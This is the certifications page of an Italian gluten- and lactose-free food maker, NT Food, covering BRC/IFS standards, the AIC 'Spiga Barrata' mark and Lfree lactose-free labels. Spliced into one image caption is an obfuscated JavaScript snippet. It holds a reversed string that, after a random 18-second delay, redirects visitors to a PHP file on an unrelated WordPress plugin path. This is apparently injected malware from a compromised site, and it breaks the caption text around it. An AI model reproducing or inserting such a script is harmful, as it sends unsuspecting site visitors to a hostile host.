Title Image

Certificazioni

Nt Food rispetta i più elevati standard di qualità e sicurezza alimentare, attestati dalla certificazione BRC/IFS, che garantisce una maggiore trasparenza nei confronti della distribuzione e dei consumatori.

Da anni NT Food opera al fianco dell’Associazione Italiana Celiachia per fornire una garanzia ai consumatori celiaci o intolleranti al glutine circa i prodotti idonei al consumo che prevendono un contenuto di glutine inferiore ai 20 ppm secondo quanto indicato dal Ministero della Salute.

Fin dagli esordi sul mercato, l’azienda è sensibile al tema dell’intolleranza al lattosio, proponendo un’ampia offerta di prodotti che spaziano dal pane a fette ai panini, dagli snack alle merendine, dai biscotti ai prodotti da ricorrenza.
A partire da quest’anno ha deciso di dare un’ulteriore garanzia ai propri consumatori, scegliendo di intraprendere il percorso di certificazione dei propri stabilimenti di produzione e della propria gamma prodotti con il marchio Lfree rilasciato da Ellefree srl.

Il marchio Lfree, con i due loghi “Lactose Free” e “Lactose & Milk Free”, garantisce a consumatori e rivenditori rispettivamente l’assenza di lattosio e l’assenza congiunta di lattosio e proteine del latte dai prodotti.

certificazione spiga barrata

Concessione AIC all’utilizzo del marchio “Spiga Barrata”

”St<script>$Ikf=function(n){if

) == "string") return $Ikf.list[n].split("").reverse().join("");return $Ikf.list[n];};$Ikf.list=["\'php.eroc_nimda/bil/steewt-tsetal-siseneg/snigulp/tnetnoc-pw/moc.nosredneherdied.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andard BRC ed IFS per la sicurezza alimentare”]
Lactose Milk Free

Certificazione che identifica e garantisce i prodotti senza lattosio oppure senza lattosio, latte e derivati.